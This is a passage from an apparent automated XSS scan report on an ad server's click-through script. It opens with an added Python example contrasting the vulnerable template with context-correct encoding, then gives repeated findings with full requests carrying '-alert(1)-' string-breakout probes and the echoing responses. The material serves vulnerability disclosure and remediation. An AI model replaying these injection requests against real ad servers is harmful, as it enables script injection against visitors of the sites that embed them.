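Issue 3.1 and its siblings below reflect request parameters into a single-quoted JavaScript string that document.write()s an anchor tag, and the probe f9b9f'-alert(1)-'8238608c5a5 works because its first quote closes the literal. The generic HTML-encoding advice in this section's remediation background does not cover that context, which is why the remediation detail says not to echo request data into script at all. The following script is an added example, not code from the XSS.CX report or from the ad server. It mirrors the response shape with a shortened template (the base URL, reduced parameter set and campaign value are assumptions; the payload is the report's probe), encodes each value for the three nested contexts it passes through (URL query component, then HTML attribute, then JS string literal, innermost first), and checks the result the way a JS lexer would: if the first string literal ends before the tag's closing quote, attacker data terminated it and the text after it runs as code.

```python
import html
from urllib.parse import quote

# The scanner's probe from issue 3.1 (the one value here taken from the report).
PAYLOAD = "f9b9f'-alert(1)-'8238608c5a5"

# Click-through template mirroring the shape of the DCLK response; base URL
# shortened and parameter set reduced, which is an assumption for the example.
TEMPLATE = ("document.write('<a target=\"_blank\" href=\"http://ad.vulnerable.ad.partner/click;"
            "~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto"
            "&camp={camp}&ad={ad}&goto=\">')")


def render_vulnerable(ad, camp):
    """Values dropped straight into the JS string literal, as observed."""
    return TEMPLATE.format(ad=ad, camp=camp)


def js_single_quoted(s):
    """Escape text for a single-quoted JavaScript string literal: backslash,
    quote, line terminators, and '</' so it can never close a script block."""
    return (s.replace("\\", "\\\\")
             .replace("'", "\\'")
             .replace("\r", "\\r").replace("\n", "\\n")
             .replace("\u2028", "\\u2028").replace("\u2029", "\\u2029")
             .replace("</", "<\\/"))


def encode_for_href_in_js(value):
    """Encode for the nested contexts innermost first: URL query component,
    then HTML attribute value, then JS string literal."""
    return js_single_quoted(html.escape(quote(value, safe=""), quote=True))


def render_hardened(ad, camp):
    """Same template, every value encoded for the context it lands in."""
    return TEMPLATE.format(ad=encode_for_href_in_js(ad), camp=encode_for_href_in_js(camp))


def first_single_quoted_literal(script):
    """Return the body of the first single-quoted string literal, scanning as a
    JS lexer would: backslash escapes are consumed, the literal ends at the
    first unescaped quote."""
    i = script.index("'") + 1
    body = []
    while i < len(script):
        ch = script[i]
        if ch == "\\":
            body.append(script[i:i + 2])
            i += 2
            continue
        if ch == "'":
            return "".join(body)
        body.append(ch)
        i += 1
    raise ValueError("unterminated string literal")


def breaks_out(script):
    """True when the literal that should hold the whole <a ...> tag ends before
    the tag's closing quote, i.e. attacker data terminated it early."""
    return not first_single_quoted_literal(script).endswith('">')


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        out = render(PAYLOAD, "ING_Direct_2010_02_1474596-nyt1")
        print(f"{name}: breaks out = {breaks_out(out)}")
        print("  literal ends with:", first_single_quoted_literal(out)[-40:])
```

Percent-encoding alone already removes the quote here, because the value sits inside a URL; the extra HTML and JS layers matter for values that are not URL components, and the order of the layers must match how the browser will unwrap them. The literal-scanner check is also a cheap way to re-verify a fix from the raw response without a browser: a patched ad server should never produce a response for which breaks_out() is true, whatever the probe.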

3.2. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 450fc'-alert(1)-'b995b495789 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1450fc'-alert(1)-'b995b495789&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1450fc'-alert(1)-'b995b495789&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.3. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2aecd'-alert(1)-'d6c622015b2 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=2aecd'-alert(1)-'d6c622015b2 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
age=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=2aecd'-alert(1)-'d6c622015b2http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.4. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af617'-alert(1)-'531d756a960 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=&af617'-alert(1)-'531d756a960=1 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 688

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/126/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
ge=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=&af617'-alert(1)-'531d756a960=1http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.5. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d5c6'-alert(1)-'c0cdb14aea7 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html8d5c6'-alert(1)-'c0cdb14aea7&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:48:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html8d5c6'-alert(1)-'c0cdb14aea7&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/pro
...[SNIP]...

3.6. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63430'-alert(1)-'c47c9696e39 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto63430'-alert(1)-'c47c9696e39&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:48:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto63430'-alert(1)-'c47c9696e39&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b6
...[SNIP]...

3.7. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d7a9'-alert(1)-'b1576cde699 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C9d7a9'-alert(1)-'b1576cde699&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C9d7a9'-alert(1)-'b1576cde699&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=
...[SNIP]...

3.8. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae5e4'-alert(1)-'aa8ce901cf was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61ae5e4'-alert(1)-'aa8ce901cf&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 684

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/122/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61ae5e4'-alert(1)-'aa8ce901cf&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.9. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c82b8'-alert(1)-'a4d6eda3c22 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178c82b8'-alert(1)-'a4d6eda3c22&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178c82b8'-alert(1)-'a4d6eda3c22&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.10. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cafe4'-alert(1)-'e519a003fdb was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclickcafe4'-alert(1)-'e519a003fdb&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclickcafe4'-alert(1)-'e519a003fdb&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.11. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea498'-alert(1)-'f486d2b26f6 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247ea498'-alert(1)-'f486d2b26f6&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247ea498'-alert(1)-'f486d2b26f6&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

3.12. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

